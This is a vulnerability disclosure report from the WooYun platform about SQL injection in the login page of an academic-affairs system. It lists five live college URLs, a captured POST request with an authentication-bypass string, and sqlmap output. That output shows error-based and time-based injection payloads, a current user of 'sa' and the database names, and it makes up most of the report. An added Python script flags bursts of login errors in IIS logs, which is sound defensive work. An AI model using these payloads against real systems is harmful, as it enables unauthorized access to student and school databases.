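2015-03-24: Details reported to the vendor; awaiting vendor handling
2015-03-29: Vendor actively ignored the vulnerability; details opened to third-party security partners
2015-05-23: Details disclosed to core white hats and experts in related fields
2015-06-02: Details disclosed to regular white hats
2015-06-12: Details disclosed to intern white hats
2015-06-27: Details disclosed to the public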
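Man: "I ask the world, what is love, that it only..." Woman: slaps him hard across the face, smack! "Screw you. A programmer who still wants a girlfriend? You deserve to die on top of your code."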
As WooYun requires, five cases!

http://jwxt.hifa.edu.cn/jiaowu/jwxs/login.asp
http://221.232.159.24/dhjw/jwxs/login.asp
http://jiaowu.hustwenhua.net/jwxs/login.asp
http://xscx.cmcedu.cn/jwxs/login.asp
http://jwxt.hycgy.com:5000/jwxs/login.asp

Capture the request while logging in:
POST /dhjw/jwxs/login.asp HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://221.232.159.24/dhjw/jwxs/login.asp
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: 221.232.159.24
Content-Length: 108
DNT: 1
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: LoginLb=; ASPSESSIONIDCSACRCTD=MMHJDOJDHFEIOOCPPELOLJME

datetime=2015-3-23+13%3A12%3A50&loginNum=&Account=%27or%27%3D%27or%27&Password=l&B1=%A1%A1%C8%B7%B6%A8%A1%A1
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: Account
    Type: error-based
    Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause
    Payload: datetime=2015-3-23 13:12:50&loginNum=&Account=-2532' OR 7256=CONVERT(INT,(SELECT CHAR(113) CHAR(106) CHAR(112) CHAR(122) CHAR(113) (SELECT (CASE WHEN (7256=7256) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(112) CHAR(118) CHAR(113) CHAR(113))) AND 'ogOj'='ogOj&Password=l&B1=%A1%A1%C8%B7%B6%A8%A1%A1

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
    Payload: datetime=2015-3-23 13:12:50&loginNum=&Account=-4128' OR 4975=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'QvyA'='QvyA&Password=l&B1=%A1%A1%C8%B7%B6%A8%A1%A1
---
[13:47:47] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2008
[13:47:47] [INFO] fetching current user
you provided a HTTP Cookie header value. The target URL provided its own cookies within the HTTP Set-Cookie header which intersect with yours. Do you want to merge them in futher requests? [Y/n] Y
[13:47:49] [INFO] retrieved: sa
current user: 'sa'
[13:47:49] [INFO] fetching current database
[13:47:49] [INFO] retrieved: dhjw
current database: 'dhjw'
[13:47:49] [INFO] fetching database names
[13:47:49] [WARNING] reflective value(s) found and filtering out
[13:47:49] [WARNING] the SQL query provided does not return any output
[13:47:49] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[13:47:49] [INFO] fetching number of databases
[13:47:49] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
[13:47:51] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based payloads
[13:47:52] [ERROR] unable to retrieve the number of databases
[13:47:52] [INFO] retrieved: dhjw
[13:47:52] [INFO] retrieved: master
[13:47:52] [INFO] retrieved: tempdb
[13:47:53] [INFO] retrieved: model
[13:47:53] [INFO] retrieved: msdb
[13:47:53] [INFO] retrieved: ReportServer
[13:47:53] [INFO] retrieved: ReportServerTempDB
[13:47:53] [INFO] retrieved: dhjw
[13:47:54] [INFO] retrieved:
available databases [7]:
[*] dhjw
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[13:47:54] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 23 times
[13:47:54] [INFO] fetched data logged to text files under 'C:\Python27\sqlmap\output\221.232.159.24'
[*] shutting down at 13:47:54
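A defender-side check suggested by the run above, as an added example that is not part of the original report: the injected value travels in the POST body, which IIS W3C logs do not record, so the signal left in the web log is the burst of HTTP 500 responses on login.asp that sqlmap itself reports. The log lines, client addresses, threshold and window below are constructed assumptions.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed IIS W3C log excerpt (not data from the report); documentation-range IPs.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Fields: date time cs-method cs-uri-stem c-ip sc-status
2015-03-23 05:47:40 POST /dhjw/jwxs/login.asp 192.0.2.10 302
2015-03-23 05:47:47 POST /dhjw/jwxs/login.asp 198.51.100.7 500
2015-03-23 05:47:49 POST /dhjw/jwxs/login.asp 198.51.100.7 500
2015-03-23 05:47:49 POST /dhjw/jwxs/login.asp 198.51.100.7 500
2015-03-23 05:47:51 POST /dhjw/jwxs/login.asp 198.51.100.7 500
2015-03-23 05:47:52 POST /dhjw/jwxs/login.asp 192.0.2.10 500
2015-03-23 05:47:53 POST /dhjw/jwxs/login.asp 198.51.100.7 500
2015-03-23 05:47:54 POST /dhjw/jwxs/login.asp 198.51.100.7 500
"""

def parse_w3c(text):
    """Yield one dict per request, taking column names from the #Fields header."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            row = dict(zip(fields, line.split()))
            stamp = row["date"] + " " + row["time"]
            row["ts"] = datetime.strptime(stamp, "%Y-%m-%d %H:%M:%S")
            yield row

def flag_error_bursts(text, suffix="/login.asp", threshold=5, window_s=60):
    """Return {client_ip: peak number of 500s on the login POST inside one window}."""
    window = timedelta(seconds=window_s)
    recent, peak = defaultdict(deque), {}
    for row in parse_w3c(text):
        # Only server errors on the login form count; a lone 500 stays below threshold.
        if row["cs-method"] != "POST" or row["sc-status"] != "500":
            continue
        if not row["cs-uri-stem"].lower().endswith(suffix):
            continue
        q = recent[row["c-ip"]]
        q.append(row["ts"])
        while row["ts"] - q[0] > window:  # drop hits older than the window
            q.popleft()
        if len(q) >= threshold:
            peak[row["c-ip"]] = max(peak.get(row["c-ip"], 0), len(q))
    return peak

if __name__ == "__main__":
    print(flag_error_bursts(SAMPLE_LOG))
```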
You're the more professional ones!
Severity: No impact (ignored by vendor)
Ignored at: 2015-06-27 15:30
None yet